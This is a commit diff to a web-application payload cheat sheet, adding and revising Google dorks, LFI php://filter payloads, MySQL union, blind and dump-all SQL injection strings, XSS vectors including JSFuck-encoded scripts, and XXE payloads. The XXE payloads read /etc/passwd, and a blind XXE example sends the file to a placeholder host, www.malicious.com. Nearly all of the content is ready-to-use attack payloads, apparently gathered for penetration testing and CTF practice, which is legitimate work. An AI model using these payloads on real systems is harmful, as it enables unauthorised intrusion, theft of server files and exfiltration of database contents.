XXE renamed, little updates in SQL/Include + enum

Enumeration_and_fingerprinting.md

@@ -5,6 +5,8 @@
 Google Dork to find subdomains
 ```
 site:*.domain.com -www
+site:http://domain.com ext:php
+site:http://domain.com filtype:pdf
 ```
 
 ## Scripts

PHP include/README.md

@@ -11,10 +11,11 @@ http://example.com/index.php?page=../../etc/passwd
 http://example.com/index.php?page=%252e%252e%252f
 ```
 
-LFI Wrapper rot13 and base64
+LFI Wrapper rot13 and base64 - php://filter case insensitive
 ```
 http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php
 http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
+http://example.com/index.php?page=php=pHp://FilTer/convert.base64-encode/resource=index.php
 ```
 
 LFI Wrapper zip

README.md

@@ -9,9 +9,28 @@ Last modifications :
 * SQLi payloads improved
 * Enumeration added (WIP)
 
-TODO : Basic methodology for hunting bugs and vulnerabilities 
+# Tools
+
+* [Web Developper](https://addons.mozilla.org/en-Gb/firefox/addon/web-developer/)
+* [Hackbar](https://addons.mozilla.org/en-Gb/firefox/addon/hackbar/?src=search)
+* [Burp Proxy](https://portswigger.net)
+* [Fiddler](https://www.telerik.com/download/fiddler)
+* [DirBuster](https://sourceforge.net/projects/dirbuster/)
+* [GoBuster](https://github.com/OJ/gobuster)
+* [Knockpy](https://github.com/guelfoweb/knock)
+* [SQLmap](http://sqlmap.org)
+* [Eyewitness](https://github.com/ChrisTruncer/EyeWitness)
+* [Nikto](https://cirt.net/nikto2)
+* [Recon-ng](https://bitbucket.org/LaNMaSteR53/recon-ng)
 
 # More resources
 Book's list:
 * Web Hacking 101 - https://leanpub.com/web-hacking-101
 * The Web Application Hacker's Handbook - https://www.amazon.fr/Web-Application-Hackers-Handbook-Exploiting/dp/1118026470  
+
+Blogs/Websites
+* http://blog.zsec.uk/101-web-testing-tooling/
+* https://blog.innerht.ml
+* https://blog.zsec.uk
+* https://www.exploit-db.com/google-hacking-database
+* https://www.arneswinnen.net

SQL injection/README.md

@@ -33,10 +33,10 @@ SELECT id FROM users WHERE username='' or true-- AND password='input2'
 # MYSQL
 MySQL Union Based
 ```
-gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata
-gRoUp_cOncaT(0x7c,table_name,0x7C)+fRoM+information_schema.tables+wHeRe+table_schema=...
-gRoUp_cOncaT(0x7c,column_name,0x7C)+fRoM+information_schema.columns+wHeRe+table_name=...
-gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+...
+UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata
+UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,table_name,0x7C)+fRoM+information_schema.tables+wHeRe+table_schema=...
+UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,column_name,0x7C)+fRoM+information_schema.columns+wHeRe+table_name=...
+UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+...
 ```
 
 
@@ -66,10 +66,10 @@ AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)
 
 MySQL Blind with MAKE_SET
 ```
-MAKE_SET(YOLO<(SELECT(length(version()))),1)
-MAKE_SET(YOLO<ascii(substring(version(),POS,1)),1)
-MAKE_SET(YOLO<(SELECT(length(concat(login,password)))),1)
-MAKE_SET(YOLO<ascii(substring(concat(login,password),POS,1)),1)
+AND MAKE_SET(YOLO<(SELECT(length(version()))),1)
+AND MAKE_SET(YOLO<ascii(substring(version(),POS,1)),1)
+AND MAKE_SET(YOLO<(SELECT(length(concat(login,password)))),1)
+AND MAKE_SET(YOLO<ascii(substring(concat(login,password),POS,1)),1)
 ```
 
 
@@ -88,7 +88,6 @@ MySQL DIOS - Dump in One Shot
 ```
 (select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0D,0x0A,' [ ',table_schema,' ] > ',table_name,' > ',column_name,0x7C))))a)#
 (select (@) from (select(@:=0x00),(select (@) from (db_data.table_data) where (@)in (@:=concat(@,0x0D,0x0A,0x7C,' [ ',column_data1,' ] > ',column_data2,' > ',0x7C))))a)#
-
 ```
 
 # POSTGRESQL

XSS injection/README.md

@@ -46,6 +46,7 @@ Svg payload
 
 XSS for HTML5
 ```
+<body onload=alert(/XSS/.source)>
 <input autofocus onfocus=alert(1)>
 <select autofocus onfocus=alert(1)>
 <textarea autofocus onfocus=alert(1)>
@@ -53,7 +54,9 @@ XSS for HTML5
 <video/poster/onerror=alert(1)>
 <video><source onerror="javascript:alert(1)">
 <video src=_ onloadstart="alert(1)">
-<details/open/ontoggle="alert`1`"
+<details/open/ontoggle="alert`1`">
+<audio src onloadstart=alert(1)>
+<marquee onstart=alert(1)>
 ```
 
 
@@ -136,7 +139,7 @@ XSS in SVG (short)
 more payloads in ./files
 
 
-# XSS with Relative Path Overwrite - IE 8/9 and lower
+## XSS with Relative Path Overwrite - IE 8/9 and lower
 
 You need these 3 components
 ```
@@ -175,7 +178,7 @@ From : http://www.thespanner.co.uk/2014/03/21/rpo/
 ```
 
 
-# Mutated XSS for Browser IE8/IE9
+## Mutated XSS for Browser IE8/IE9
 ```
 <listing id=x>&lt;img src=1 onerror=alert(1)&gt;</listing>
 <script>alert(document.getElementById('x').innerHTML)</script>
@@ -217,6 +220,7 @@ Bypass parenthesis for string
 alert`1`
 ```
 
+Exotic payloads
 ```
 <script>$=1,alert($)</script>
 <script ~~~>confirm(1)</script ~~~> 
@@ -279,7 +283,6 @@ PHP 		a = val2
 Use JSFuck to encode the payload (alert())
 ```javascript
 <script>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+"("+$.___+")"+"\"")())();</script>
-
 <script>(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()</script>
 ```
 

XXE injections/README.md

@@ -18,7 +18,7 @@ Classic XXE
 <?xml version="1.0"?>
 <!DOCTYPE data [
 <!ELEMENT data (#ANY)>
-<!ENTITY file SYSTEM "file:///sys/power/image_size">
+<!ENTITY file SYSTEM "file:///etc/passwd">
 ]>
 <data>&file;</data>
 ```
@@ -28,6 +28,21 @@ Classic XXE Base64 encoded
 <!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,PCFF...Cg=="> %init; ]><foo/>
 ```
 
+PHP Wrapper inside XXE
+```
+<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
+<contacts>
+  <contact>
+    <name>Jean &xxe; Dupont</name>
+    <phone>00 11 22 33 44</phone>
+    <adress>42 rue du CTF</adress>
+    <zipcode>75000</zipcode>
+    <city>Paris</city>
+  </contact>
+</contacts> 
+```
+
+
 Deny Of Service - Billion Laugh Attack
 ```
 <!DOCTYPE data [
@@ -40,6 +55,18 @@ Deny Of Service - Billion Laugh Attack
 <data>&a4;</data>
 ```
 
+Blind XXE
+```
+<?xml version="1.0" encoding="ISO-8859-1"?>
+<!DOCTYPE foo [
+<!ELEMENT foo ANY >
+<!ENTITY % xxe SYSTEM "file:///etc/passwd" >
+<!ENTITY callhome SYSTEM "www.malicious.com/?%xxe;">
+]
+>
+<foo>&callhome;</foo>
+```
+
 
 XXE OOB Attack (Yunusov, 2013)
 ```